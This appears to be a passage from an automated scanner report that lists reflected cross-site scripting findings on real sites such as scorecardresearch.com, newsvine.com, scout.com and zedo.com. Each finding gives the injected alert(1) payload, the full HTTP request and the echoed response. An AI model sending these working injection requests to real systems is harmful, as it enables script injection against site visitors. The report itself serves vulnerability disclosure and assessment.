HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Feb 2011 01:41:01 GMT Date: Sun, 30 Jan 2011 01:41:01 GMT Connection: close Content-Length: 3594
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 56554<script>alert(1)</script>f33f0880492 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=13236&c5=&c6=&c10=3203787&c15=56554<script>alert(1)</script>f33f0880492 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Feb 2011 01:41:02 GMT Date: Sun, 30 Jan 2011 01:41:02 GMT Connection: close Content-Length: 3594
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 43a79<script>alert(1)</script>dd3f69c507c was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=613540443a79<script>alert(1)</script>dd3f69c507c&c3=15&c4=13236&c5=&c6=&c10=3203787&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Feb 2011 01:40:59 GMT Date: Sun, 30 Jan 2011 01:40:59 GMT Connection: close Content-Length: 3594
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 5141c<script>alert(1)</script>2e5b41528d3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=155141c<script>alert(1)</script>2e5b41528d3&c4=13236&c5=&c6=&c10=3203787&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Feb 2011 01:41:00 GMT Date: Sun, 30 Jan 2011 01:41:00 GMT Connection: close Content-Length: 3594
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 9293a<script>alert(1)</script>f40783d132b was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=132369293a<script>alert(1)</script>f40783d132b&c5=&c6=&c10=3203787&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Feb 2011 01:41:00 GMT Date: Sun, 30 Jan 2011 01:41:00 GMT Connection: close Content-Length: 3594
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload c4a9f<script>alert(1)</script>8ebac23ddb was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=13236&c5=c4a9f<script>alert(1)</script>8ebac23ddb&c6=&c10=3203787&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Feb 2011 01:41:00 GMT Date: Sun, 30 Jan 2011 01:41:00 GMT Connection: close Content-Length: 3593
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload b3111<script>alert(1)</script>7cb1ccd4cdb was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=13236&c5=&c6=b3111<script>alert(1)</script>7cb1ccd4cdb&c10=3203787&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Feb 2011 01:41:01 GMT Date: Sun, 30 Jan 2011 01:41:01 GMT Connection: close Content-Length: 3594
5.170. http://bodyodd.msnbc.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bodyodd.msnbc.msn.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a15c"><script>alert(1)</script>f4addc07d04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?1a15c"><script>alert(1)</script>f4addc07d04=1 HTTP/1.1 Host: bodyodd.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:06:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 109695
5.171. http://boyle.newsvine.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boyle.newsvine.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab874"-alert(1)-"1395f8ac659 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ab874"-alert(1)-"1395f8ac659=1 HTTP/1.1 Host: boyle.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:51:54 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=8d410fec781195f3ae452149bdba91fe; expires=Sat, 25-Jan-2031 17:51:54 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 88082
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
5.172. http://cartoonblog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cartoonblog.msnbc.redacted
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bcba"><script>alert(1)</script>a8948eec705 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?9bcba"><script>alert(1)</script>a8948eec705=1 HTTP/1.1 Host: cartoonblog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:06:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 96204
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9abcf<script>alert(1)</script>b5f8440495c was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeds/analyticsfeed.ashx?page=http%3A//recruiting.scout.com/a.z%3Fs%3D73%26p%3D9%26c%3D4%27%26pid%3D88%26yr%3D2011&format=json&callback=$.analytics.report9abcf<script>alert(1)</script>b5f8440495c HTTP/1.1 Host: cdn-cms.scout.com Proxy-Connection: keep-alive Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1295040115.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; __utma=202704078.801620371.1294455998.1294851033.1295040115.3; RefId=0; BrandId=0; SessionBrandId=0
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Server: Static1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 Cache-Control: private Content-Type: application/x-javascript; charset=utf-8 Vary: Accept-Encoding Date: Sun, 30 Jan 2011 01:42:04 GMT Connection: close Akamai: True Content-Length: 360
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload dae03<script>alert(1)</script>e852a0a6e49 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adfeed.ashx?s=73&format=json&callback=$.showAd.cacheAdCodesdae03<script>alert(1)</script>e852a0a6e49 HTTP/1.1 Host: cdn-forums.scout.com Proxy-Connection: keep-alive Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1295040115.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; __utma=202704078.801620371.1294455998.1294851033.1295040115.3; RefId=0; BrandId=0; SessionBrandId=0
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Server: Mbrd8 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Website-Assembly-Version: 2.21.0.0 Cache-Control: private Content-Type: application/x-javascript; charset=utf-8 Vary: Accept-Encoding Date: Sun, 30 Jan 2011 01:42:14 GMT Connection: close Akamai: True Content-Length: 334
5.175. http://cosmiclog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cosmiclog.msnbc.redacted
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c4ad"><script>alert(1)</script>299dbf28056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?5c4ad"><script>alert(1)</script>299dbf28056=1 HTTP/1.1 Host: cosmiclog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:08:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 145326
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 252d4'%3balert(1)//21a050c29ea was submitted in the $ parameter. This input was echoed as 252d4';alert(1)//21a050c29ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=929:252d4';alert(1)//21a050c29ea;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "81ee0c62-82a5-4989a5416ab80" Vary: Accept-Encoding X-Varnish: 2233582304 2233582012 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=254 Expires: Sat, 29 Jan 2011 23:22:44 GMT Date: Sat, 29 Jan 2011 23:18:30 GMT Connection: close Content-Length: 2378
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=123;var zzPat=',252d4';alert(1)//21a050c29ea';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,252d4';alert(1)//21a050c29ea;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5a47"%3balert(1)//a05e4eb410d was submitted in the $ parameter. This input was echoed as a5a47";alert(1)//a05e4eb410d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=929:a5a47";alert(1)//a05e4eb410d;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "81ee0c62-82a5-4989a5416ab80" Vary: Accept-Encoding X-Varnish: 2233582304 2233582012 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=255 Expires: Sat, 29 Jan 2011 23:22:44 GMT Date: Sat, 29 Jan 2011 23:18:29 GMT Connection: close Content-Length: 2392
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=123;var zzPat=',a5a47";alert(1)//a05e4eb410d';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,a5a47";alert(1)//a05e4eb410d;z="+Math.random();}
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e50f4'-alert(1)-'430b04548c0 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d2/jsc/fm.js?c=e50f4'-alert(1)-'430b04548c0 HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; ZFFAbh=749B826,20|1483_759#365; FFad=0:0:0:1:0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 941 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "81ee0c62-82a5-4989a5416ab80" X-Varnish: 2233582304 2233582012 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=414 Expires: Sat, 29 Jan 2011 23:29:14 GMT Date: Sat, 29 Jan 2011 23:22:20 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
if(zz ...[SNIP]...
5.179. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://d7.zedo.com
Path:
/bar/v16-401/d2/jsc/fm.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb9ab'-alert(1)-'bacc7d9a398 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d2/jsc/fm.js?fb9ab'-alert(1)-'bacc7d9a398=1 HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; ZFFAbh=749B826,20|1483_759#365; FFad=0:0:0:1:0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 941 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "81ee0c62-82a5-4989a5416ab80" X-Varnish: 2233582304 2233582012 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=416 Expires: Sat, 29 Jan 2011 23:29:14 GMT Date: Sat, 29 Jan 2011 23:22:18 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b9af'%3balert(1)//7005141fb0c was submitted in the q parameter. This input was echoed as 1b9af';alert(1)//7005141fb0c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "81ee0c62-82a5-4989a5416ab80" Vary: Accept-Encoding X-Varnish: 2233582304 2233582012 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=255 Expires: Sat, 29 Jan 2011 23:22:44 GMT Date: Sat, 29 Jan 2011 23:18:29 GMT Connection: close Content-Length: 2389
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=123;var zzPat='1b9af';alert(1)//7005141fb0c';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=1b9af';alert(1)//7005141fb0c;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3767"%3balert(1)//62e257b111a was submitted in the q parameter. This input was echoed as a3767";alert(1)//62e257b111a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "81ee0c62-82a5-4989a5416ab80" Vary: Accept-Encoding X-Varnish: 2233582304 2233582012 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=255 Expires: Sat, 29 Jan 2011 23:22:44 GMT Date: Sat, 29 Jan 2011 23:18:29 GMT Connection: close Content-Length: 2375
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=123;var zzPat='a3767";alert(1)//62e257b111a';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=a3767";alert(1)//62e257b111a;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b448'%3balert(1)//a06e2db3d7d was submitted in the $ parameter. This input was echoed as 7b448';alert(1)//a06e2db3d7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
